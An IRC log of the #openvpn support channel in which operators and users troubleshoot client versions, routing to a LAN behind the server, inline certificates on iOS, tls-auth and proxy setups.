EugeneKay, i'd like to configure this little client-server config and i'll be away forever, he problem is that nothing works 11:15 <@dazo> tabakhase: what about your server certificate? 11:16 <@ecrist> tabakhase: upgrade your openvpn client 11:16 <@ecrist> you're using 2.0.9, you need to use 2.3.0 11:16 <@ecrist> !download 11:16 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 11:16 <@dazo> EugeneKay: join the club krzee and I started .... just /ig vaillor ... it'll give you peace 11:16 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 11:16 < tabakhase> dazo thats "Subject: C=DE, ST=Berlin, L=Berlin, O=eKomi Ltd., CN=sid.ekomi.de/emailAddress=hostmaster@ekomi.de" - "Issuer: C=DE, ST=Berlin, L=Berlin, O=eKomi Ltd., CN=eKomi sid-vpn ROOT CA/emailAddress=hostmaster@ekomi.de" -- all formed with pkitool 11:16 <@EugeneKay> dazo - I can do one better than that 11:16 < TheWarden> What do I have to change in my OpenVPN configuration to allow the authenticated client to be able to access the network? Presently I'm able to connect in as a client successfully but I can only ping the OpenVPN server, nothing else on the network is accessible. 11:17 -!- mode/#openvpn [+q *!*@2-226-37-187.ip179.fastwebnet.it] by EugeneKay 11:17 <@EugeneKay> !route 11:17 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs 11:17 <@dazo> tabakhase: that looks like your CA certificate 11:17 <@EugeneKay> TheWarden ^ 11:17 <@vpnHelper> behind the server or client 11:17 <@ecrist> TheWarden: you need to push routes for your remote LAN to the VPN clients 11:18 <@dazo> tabakhase: do not ever confuse CA and server certificates .... and as ecrist said ... upgrade your client too 11:18 <@dazo> 2.0 isn't too happy with 2.1, and most likely even less happy with 2.2 and 2.3 11:18 <@EugeneKay> What the heck is still on 2.0 11:18 <@EugeneKay> RHEL5 & derivatives? 11:19 <@dazo> EugeneKay: Debian stable, I belive too 11:19 <@dazo> But EL5 can get the remedy by installing EPEL 11:19 <@EugeneKay> Or by upgrading to 6 11:19 < TheWarden> ecrist: so I just edit the server.conf and add something like push "route 192.168.0.1 255.255.255.0" ? I'm not sure if the first IP is suppose to be. 11:19 <@dazo> EugeneKay: yeah, but far bigger operation than installing EPEL ;-) 11:19 < uberushaximus> nope 11:19 < uberushaximus> debian stable is on 2.1 11:20 < tabakhase> setupping 2.3.... 11:20 < uberushaximus> backports has 2.2 11:20 <@EugeneKay> TheWarden - that should be the netmask of the network you're trying to grant access to 11:20 < tabakhase> and i dont mixed any certs, thers a selfsigned CA that signed server (sid.ekomi.de) and client (chackmann) 11:20 <@dazo> EugeneKay: but in this case .... it's a Windows user .... 11:20 <@dazo> OpenVPN 2.0.9 Win32-MinGW 11:20 <@ecrist> tabakhase: start with an updated client 11:21 <@EugeneKay> Oh dear god, I bet he's using the old .se thing 11:21 <@EugeneKay> !download 11:21 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 11:21 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 11:21 <@ecrist> EugeneKay: you should really try to keep up 11:21 <@EugeneKay> Too much clicking 11:21 <@dazo> heh 11:21 < tabakhase> ecrist thats what im doing... [17:18:59] setupping 2.3... 11:22 <@EugeneKay> Well there you go 11:23 < tabakhase> WORKS LIKE A CHARM! - you remember, thers been a reason i didnt started of with pasting tons of logs... i knew its a individual client problem (as i had other clients running fine) 11:23 < tabakhase> still i see, 90% of the guys "knowing whts the problem" actually dont ;D 11:25 <@ecrist> tabakhase: we wouldn't have known you needed to update without the log 11:26 < TheWarden> EugeneKay: right so 192.168.0.0 255.255.255.0 mmm still not working. 11:26 <@EugeneKay> !serverlan 11:26 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 11:26 < tabakhase> ecrist fair point, still it could be the first quick shot - just like "did you powered it on & pluged the cable in" ;-) 11:26 <@EugeneKay> Follow the chart ^ 11:27 < TheWarden> I setup the router to port forward to the OpenVPN server I wonder if that is not done correctly. I can connect fine to the VPN server. mmm 11:27 <@EugeneKay> The chart knows all 11:28 <@ecrist> tabakhase: did you read /topic when you joined the channel? 11:28 <@ecrist> right in /topic it says what the current version is - yours was only 7 years out of date 11:29 < tabakhase> ecrist using a bouncer, im in here for moths ;-) should gave a //topic # to refresh... 11:29 <@EugeneKay> Sane bouncers/clients will display the /topic when you start it up 11:29 <@EugeneKay> Mine does. 11:30 <@ecrist> tabakhase: the truth is, I ask for !logs right away. The first thing I look at is the openvpn version string 11:30 <@ecrist> then I look to other issues 11:31 <@ecrist> I've had people using 2.0.9 tell me they were using "most current" version, but as EugeneKay suggested, they got their client from openvpn.se, instead of the official repo 11:31 <@ecrist> there really is a method to my madness 11:31 <@EugeneKay> People are idiots. 11:32 < tabakhase> i think ive strummpled above openvpn.net because the fakeshit private tunnel they try to sneak on machines 11:32 <@EugeneKay> .net is the official site 11:32 < uberushaximus> olo 11:32 <@EugeneKay> AS/PrivateTunnel is the commercial thing 11:33 <@ecrist> they sneak private tunnel onto machines???? 11:33 <@ecrist> fakeshit? 11:33 <@EugeneKay> No, just people who can't read. 11:33 < tabakhase> i guess the count "people getting scamwared by this" is >9000 11:33 <@ecrist> tabakhase: wtf are you talking about? 11:34 <@EugeneKay> It would be nice if the front page was clearer about the difference between AS/PT and GPL(some actual text would be nice), but hey 11:34 < tabakhase> ecrist from the fact that noone will ever get the idea to go to the community tab when just looking for the "software openvpn" when theres already a huge download button 11:35 < tabakhase> community? forums? no, i want a download, not a discussion... 11:36 <@ecrist> that's hardly scamware, but I see your point 11:36 <@ecrist> it's better than it used to be 11:36 < TheWarden> !ipforward 11:36 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 11:37 < tabakhase> so what do we have? viruses on download.com, stoneage software on openvpn.se (that seeemd like they tried to solve the issue of no nice to find download) and nicely hidden download on the producers website 11:37 <@EugeneKay> Feel free to complain to somebody who can do something about it 11:37 <@EugeneKay> IE, not us. 11:38 < tabakhase> ^^ 11:38 < TheWarden> !route_outside_openvpn 11:38 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png 11:38 < TheWarden> !route 11:38 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs 11:38 <@vpnHelper> behind the server or client 11:42 -!- copper [~copper@unaffiliated/copper] has joined #openvpn 11:43 -!- newbie is now known as TMcTrain 11:43 < copper> hi 11:44 -!- fulcan [brads@2600:3c00::f03c:91ff:fe70:f0a9] has quit [Quit: Hey! Where'd my controlling terminal go?] 11:44 < copper> I asked a while ago about the battery consumption of the android app 11:44 < copper> I was directed to the FAQ and I changed my config to "keepalive 30 90" 11:44 < copper> that worked for a while 11:44 < copper> but now I have battery consumption issues again, I'm guessing from one of the latest updates 11:45 <@EugeneKay> Turn the connection off if you aren't actively using it. Having an always-on network connection will cause it to eat your battery 11:45 < copper> I barely use my galaxy nexus, yet I'm currently at 39% after 14 hours 34 minutes 11:45 <@EugeneKay> This is how CPU and network stacks actually work. 11:45 < copper> but it used to be fine 11:46 < copper> supposedly the screen represents 46% of the consumption, but I figured out that OpenVPN never showed in the list 11:46 <@ecrist> then why do you think it's Openvpn? 11:47 <@ecrist> honestly, I doubt it's openvpn that's killing your battery 11:47 < copper> ok 11:47 < copper> I'll turn of openvpn, charge the battery, run everything else like usual, and we'll see 11:47 < copper> off* 11:48 < copper> I'll come back tomorrow if I figure out that openvpn is indeed the culprit 11:48 < copper> sounds fair? 11:48 <@ecrist> sure? 11:48 < copper> ok 11:48 < copper> have a nice day! 11:48 -!- copper [~copper@unaffiliated/copper] has left #openvpn [] 11:52 -!- marksaitis [~marksaiti@81.101.81.114] has quit [Ping timeout: 245 seconds] 11:53 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 11:57 < tabakhase> ((just for clearane, the certs i posted before been the testing ones and got replaced ;-))) 11:57 < TheWarden> Here is my server.conf, https://gist.github.com/thewarden/77f5eab37a59ad0f245f. Presently I'm able to connect successfully to the OpenVPN server as a client but I'm not able to access any server on the LAN. I can ping the OpenVPN server, but not the gateway/router or any other server. 11:57 < TheWarden> I'm reading on the subject but I'm not understand what to change. 12:02 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 12:06 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 12:10 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 248 seconds] 12:11 -!- AsadH is now known as zz_AsadH 12:12 <@plaisthos> ecrist: openvpn is quite good in killing the battery without showing up as battery killer :) 12:13 <@plaisthos> http://developer.android.com/training/efficient-downloads/efficient-network-access.html 12:13 <@vpnHelper> Title: Optimizing Downloads for Efficient Network Access | Android Developers (at developer.android.com) 12:13 <@plaisthos> and just think what would happen with 10s keepalive :) 12:13 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 12:21 <@ecrist> plaisthos: really? 12:22 <@plaisthos> yeah 12:22 <@plaisthos> keeping the radio active 12:25 <@ecrist> that's an interesting article 12:31 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 12:31 -!- mode/#openvpn [+v s7r] by ChanServ 12:49 -!- JSharpe [~JSharpe@46.165.210.17] has joined #openvpn 12:55 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Ping timeout: 260 seconds] 12:55 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 13:02 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Ping timeout: 250 seconds] 13:03 -!- soapee01_ is now known as soapee01 13:06 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 13:06 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:06 <@dazo> hmmm .... http://www.reuters.com/article/2013/03/10/us-iran-internet-idUSBRE9290CV20130310 13:06 <@vpnHelper> Title: Iran blocks use of tool to get around Internet filter | Reuters (at www.reuters.com) 13:07 -!- brute11k [~brute@89.249.230.104] has joined #openvpn 13:10 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Ping timeout: 248 seconds] 13:11 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 13:11 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 246 seconds] 13:14 -!- jc_linux_ [~jason@72.84.113.162] has joined #openvpn 13:15 < jc_linux_> has anyone successfully configured an iOS device to connect to a personal openvpn server? 13:15 <@ecrist> afaik, a lot of people have 13:17 < jc_linux_> @ecrist: Is there anything particular with the fields of the CA cert to set? ovpn config could use a path, obviously, iOS has some other mechanism to lookup the cert. 13:17 -!- master_of_master [~master_of@p4FF24746.dip.t-dialin.net] has joined #openvpn 13:18 <@ecrist> the best option is to embed the certificates and key in the config itself 13:18 < jc_linux_> mobileconfig or ovpn? I'm currently using mobileconfig 13:19 <@ecrist> openvpn 13:19 <@ecrist> no idea what mobileconfig is 13:19 < uberushaximus> ios' cert mechanism 13:20 < jc_linux_> iPhone Configuration Utility generated profiles are XML with extension .mobileconfig 13:20 -!- master_o1_master [~master_of@p4FF24E96.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 13:21 < jc_linux_> I added my CA and my p12 to the profile, and configured the VPN to use the p12. Not sure how to get OpenVPN to find the CA. 13:21 * ecrist fires up iphone sim 13:23 < jc_linux_> directions I followed are here: https://forums.openvpn.net/topic12019.html 13:23 <@vpnHelper> Title: OpenVPN Support Forum VPN-On-Demand configuration error: CertificateRef undefined : OpenVPN Connect (iOS) (at forums.openvpn.net) 13:23 < jc_linux_> @vpnHelper: dueling url's ;-) 13:24 <@ecrist> jc_linux_: vpnHelper is a bot 13:25 <@ecrist> i don't have an iphone, so I've never set it up 13:26 < jc_linux_> I think my main point of confusion is "you must enter for the "ca" value the exact containt of your ca.crt" , what is containt? *all* the cleartext fields, the CN? 13:27 <@ecrist> look at the CA certificate itself 13:27 <@ecrist> you'll see a ----- BEGIN blah balh ----- END blah bal 13:28 <@ecrist> it's a square block of text 13:28 <@ecrist> copy that into your VPN configuration file 13:28 <@ecrist> remove the ca line 13:28 <@ecrist> then, around the pasted certificate, before, put and after put 13:33 <@plaisthos> !inline 13:33 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 13:34 < jc_linux_> @ecrist: ahh, I see. OpenVPN isn't pulling the CA from the iOS certificate store, so it needs it internally. "containt" == "contents" 13:35 < jc_linux_> @ecrist: Thanks for the help. 13:37 <@ecrist> did that work for you? 13:37 <@ecrist> thanks, plaisthos, I forget about that factoid 13:39 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 264 seconds] 13:40 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:41 < jc_linux_> @ecrist: testing it now. had to concoct some tr/sed magic to go 0x0a -> \n 13:42 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 14:04 -!- dazo is now known as dazo_afk 14:04 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 14:04 < jc_linux_> @ecrist: Sweet! It works! Thanks again for the help. 14:11 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 14:14 <@ecrist> no problem. 14:21 < TheWarden> I've been using this article to help setup my OpenVPN. Thus far it has done quite a good job in assisting to that, however in regards to making this useful I need to get access to the entire LAN which right now do not have access. Do I follow the firewall steps to fix this? http://wingloon.com/2012/05/25/how-to-install-setup-openvpn-on-debian-6-0-squeeze-with-certificate-authentication/ 14:21 <@vpnHelper> Title: How To Install Setup OpenVPN on Debian 6.0 Squeeze with Certificate Authentication | WING LOON (at wingloon.com) 14:21 < TheWarden> I'm not familiar with this at all nor do I have a firewall.sh or even sure that is how it is used on Debian Squeeze. 14:22 <@ecrist> !route 14:22 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs 14:22 <@vpnHelper> behind the server or client 14:22 <@ecrist> see that, TheWarden 14:30 -!- jc_linux_ [~jason@72.84.113.162] has left #openvpn [] 14:30 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 14:32 -!- Irssi: #openvpn: Total of 175 nicks [8 ops, 0 halfops, 2 voices, 165 normal] 14:39 < TheWarden> ecrist: I've been reading that first link over and over trying to make sense of it. Is this article stating that I need to know the client's IP network address in order to make this work? I really don't want to know it nor want to hard code that as what if it changes then things break. 14:41 <@ecrist> no, you don't, since you're just trying to access the lan of the server, right? 14:49 -!- p3rror [~mezgani@41.140.99.173] has joined #openvpn 14:52 < TheWarden> yes right 14:52 <@ecrist> so, then you JUST need: 14:53 <@ecrist> push "route X.Y.Z.0 255.255.255.0" 14:53 <@ecrist> in the server config 14:53 <@ecrist> where you replace my garbage with your IP block and subnet mask 14:53 < TheWarden> so then my network is 192.168.0.0 so I set push "route 192.168.0.0 255.255.255.0" in the server config. 14:53 < TheWarden> I have this already but still can't access resources on the LAN once connected vi the VPN. 14:54 < TheWarden> now I don't have a route statement nor a client-to-client mmmm 14:58 -!- speed_racer8 [~speed_rac@h226.16.185.173.dynamic.ip.windstream.net] has joined #openvpn 14:59 <@ecrist> I'd STRONGLY suggest changing that IP subnet 14:59 <@ecrist> !1918 14:59 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? Try this one: http://scarydevilmonastery.net/subnet.cgi 14:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:00 <@ecrist> TheWarden: is your VPN server also your LAN gateway? 15:00 <@ecrist> or, what is the local IP of the client you're using for testing? 15:01 < TheWarden> ecrist: I can't change the LAN network of 192.168.x.x, that would be a big change to go and change everything. The OpenVPN IP that is issued when authenticating is 10.8.0.0. The OpenVPN server is 192.168.0.240, router/gateway is 192.168.0.1 (different system then OpenVPN). 15:02 < TheWarden> ecrist: The VPN server is not the LAN gateway, VPN is 192.168.0.240 and gateway is 192.168.0.1 15:04 < TheWarden> VPN subnet server 10.8.0.0 255.255.255.0 15:05 < TheWarden> My current server.conf, https://gist.github.com/thewarden/77f5eab37a59ad0f245f 15:05 <@vpnHelper> Title: The OpenVPN works but the client can not access servers on the LAN of the VPN server. I can only ping the OpenVPN server itself not the gateway/router or any other server on the LAN. (at gist.github.com) 15:06 -!- p3rror [~mezgani@41.140.99.173] has quit [Quit: Leaving] 15:11 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 15:11 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 15:17 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 15:18 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 15:19 -!- Devastator [~devas@186.214.110.30] has joined #openvpn 15:29 -!- brute11k [~brute@89.249.230.104] has quit [Quit: Leaving.] 15:36 * TheWarden sighs out of frustration 15:46 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:48 -!- p3rror [~mezgani@41.140.99.173] has joined #openvpn 15:50 < TheWarden> the VPN server, do I need to alter the iptables in order for this to work? 15:51 < dioz> uh 15:53 < TheWarden> I've read over and over these articles given to me and still nothing. I'm just not getting it I guess. argh 16:01 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has joined #openvpn 16:07 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 264 seconds] 16:07 -!- mezgani [~mezgani@41.249.96.133] has joined #openvpn 16:10 -!- p3rror [~mezgani@41.140.99.173] has quit [Ping timeout: 260 seconds] 16:12 -!- mezgani [~mezgani@41.249.96.133] has quit [Read error: Connection reset by peer] 16:31 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:44 -!- speed_racer8 [~speed_rac@h226.16.185.173.dynamic.ip.windstream.net] has quit [Quit: Leaving] 16:49 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has joined #openvpn 16:49 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has quit [Remote host closed the connection] 16:50 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has joined #openvpn 16:51 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 240 seconds] 17:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 17:02 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 17:09 -!- fatpony [~fatpony@88-190-211-231.rev.dedibox.fr] has quit [Changing host] 17:09 -!- fatpony [~fatpony@unaffiliated/fatpony] has joined #openvpn 17:11 -!- TMcTrain [~kvirc@p54BBB9D2.dip.t-dialin.net] has joined #openvpn 17:13 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has quit [Ping timeout: 264 seconds] 17:17 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 17:19 < TheWarden> I'm trying to run the following command openvpn –-genkey –-secret keys/ta.key but oddly I keep getting back "Options error: I'm trying to parse "–-genkey" as an --option parameter but I don't see a leading '--'" 17:23 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 17:25 < jzaw> TheWarden, .... –-genke its not -- its –- you have there 17:26 < jzaw> if you paste it in a word processor ..... and enlarge the font youll see the difference 17:26 < TheWarden> jzaw: that's how it appears when I paste it here. --genkey is what I typed 17:26 < rob0> ASCII hyphen hyphen 17:26 <@EugeneKay> TheWarden - openvpn --version? 17:26 < TheWarden> rob0: that's what I'm typing on the keyboard 17:27 < jzaw> try copy paste this ... -- 17:27 < TheWarden> OpenVPN 2.3.0 x86_64-pc-linux-gnu 17:27 < TheWarden> -- 17:27 <@EugeneKay> Interesting. 17:32 < TheWarden> it is, its odd... 17:34 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 17:38 -!- JSharpe [~JSharpe@46.165.210.17] has quit [Quit: Leaving] 17:49 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 17:51 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 18:05 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 245 seconds] 18:12 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 18:14 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 18:15 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 18:23 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Operation timed out] 18:27 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 18:30 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 18:34 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 260 seconds] 18:36 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 272 seconds] 18:39 -!- cronix [~cronix@HSI-KBW-046-005-192-177.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 18:39 < cronix> hi all 18:40 -!- vaillor [~ahah@2-226-37-187.ip179.fastwebnet.it] has left #openvpn [] 18:40 < cronix> is it possible to have this kind of setup? 18:40 -!- vect0rx [vectorx@havok.org] has quit [Ping timeout: 264 seconds] 18:40 -!- vaillor [~ahah@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 18:40 -!- vaillor [~ahah@2-226-37-187.ip179.fastwebnet.it] has left #openvpn [] 18:40 < cronix> client -> VPN -> Internet -> VPN -> Server -> Privoxy Proxy -> Internet 18:41 < cronix> and to configure the proxy for the vpn server part 18:41 < cronix> so that the client just has to connect to VPN? 18:48 < pekster> cronix: Yes it is. I have a similar setup on a cloud VM I run where it acts as an OpenVPN server and runs tinyproxy. By connecting to the VPN, I can use a separate browser profile I've configured to use that proxy at the other end of the VPN when I need an external IP to test from 18:48 < pekster> OpenVPN just establishes a link between 2 systems (your "client" and "server.") You're free to exchange any type of traffic you would like over this link 18:51 < cronix> but theres no way to not have to touch the client browser is it? 18:51 < cronix> the idea behind this is 18:51 < cronix> i live in germany and a lot of good stuff is blocked by gema etc 18:52 < cronix> therefore i have a premium proxy which redirects traffic to youtube for example via french servers 18:52 -!- mode/#openvpn [-q *!*@2-226-37-187.ip179.fastwebnet.it] by EugeneKay 18:52 < cronix> my idea was to setup a vpn which has all http traffic of every computer automatically proxyed to those servers on the serverside 18:53 < cronix> so i dont have to configure the laptops of my girlfriend and a lot of other systems 18:54 < cronix> even more important, to have the proxy enabled on my android devices while on the go aswell via vpn 18:54 < cronix> i think i have to do some nasty socks proxy routing on the dedicated server via iptables :C 18:55 < pekster> Maybe you want to look at: 18:55 < pekster> !redirect 18:55 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 18:55 <@vpnHelper> http://ircpimps.org/redirect.png 18:55 < cronix> that part works already 18:55 < cronix> i have my xoom tablet connected to my vpn server 18:55 < cronix> and can access the internet via the vpn 18:55 < cronix> with the ip of my dedicated 18:55 < pekster> Then why bother with a proxy? If you use redirect-gateway, *all* Internet-bound traffic flows through the VPN, not just web traffic 18:56 < cronix> because the server also is in germany 18:56 < cronix> the premium proxy is just a http proxy of a third party 18:58 < cronix> i guess i have to do something like this on the server 18:59 < cronix> openvpn -> iptables routing -> socks proxy -> privoxy -> premium http proxy 18:59 < cronix> this is gonna get nasty 18:59 < cronix> wrong chat then though :D 19:03 -!- ade_b [~Ade@koln-4d0b0fff.pool.mediaWays.net] has joined #openvpn 19:03 -!- ade_b [~Ade@koln-4d0b0fff.pool.mediaWays.net] has quit [Changing host] 19:03 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 19:06 -!- vistas [~vistas@c-71-204-33-119.hsd1.ga.comcast.net] has left #openvpn [] 19:09 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 264 seconds] 19:15 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 19:15 -!- HyperGlide [~HyperGlid@221.237.121.63] has quit [Remote host closed the connection] 19:16 -!- novaflash is now known as novaflash_away 19:16 -!- HyperGlide [~HyperGlid@221.237.121.63] has joined #openvpn 19:20 -!- HyperGlide [~HyperGlid@221.237.121.63] has quit [Ping timeout: 258 seconds] 19:27 -!- twb [~twb@203.7.155.73] has joined #openvpn 19:28 < twb> Er, quick sanity check please. I thought --tls-auth ta.key or so was always needed, and it was a pre-shared key used to HMAC packets once the TLS handshake had been done, or something like that. 19:29 < twb> But I see $coworker who has set up the server side of a VPN, has not mentioned tls-auth in his config at all (despite having a ta.key) 19:29 < twb> Is that 1) valid?; and 2) sensible? 19:30 < twb> Hm, manpage seems to indicate that you can use openvpn without --tls-auth, but it's a bad idea. 19:37 < pekster> twb: It's fine to run without that. It's just a way to drop packets before the peer allocates resources setting up a TLS handshake 19:39 -!- raidz is now known as raidz_away 19:40 < twb> Okey dokey 20:17 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 20:26 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 20:29 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 20:36 -!- vect0rx [vectorx@havok.org] has joined #openvpn 20:37 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 20:42 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has joined #openvpn 20:43 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has quit [Read error: Connection reset by peer] 20:43 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has joined #openvpn 20:49 -!- M1L0 [~M1L0@unaffiliated/m1l0] has joined #openvpn 20:50 < M1L0> buenas 20:51 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 20:51 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 20:52 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 20:55 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 20:56 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 20:57 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 20:59 -!- ddlk [~ddlk@183.246.96.216] has joined #openvpn 20:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 20:59 < ddlk> Hi, guys, anyway to bypass the China's firewall? 21:00 < ddlk> OpenVPN is already blocked, even on port 443 with TCP 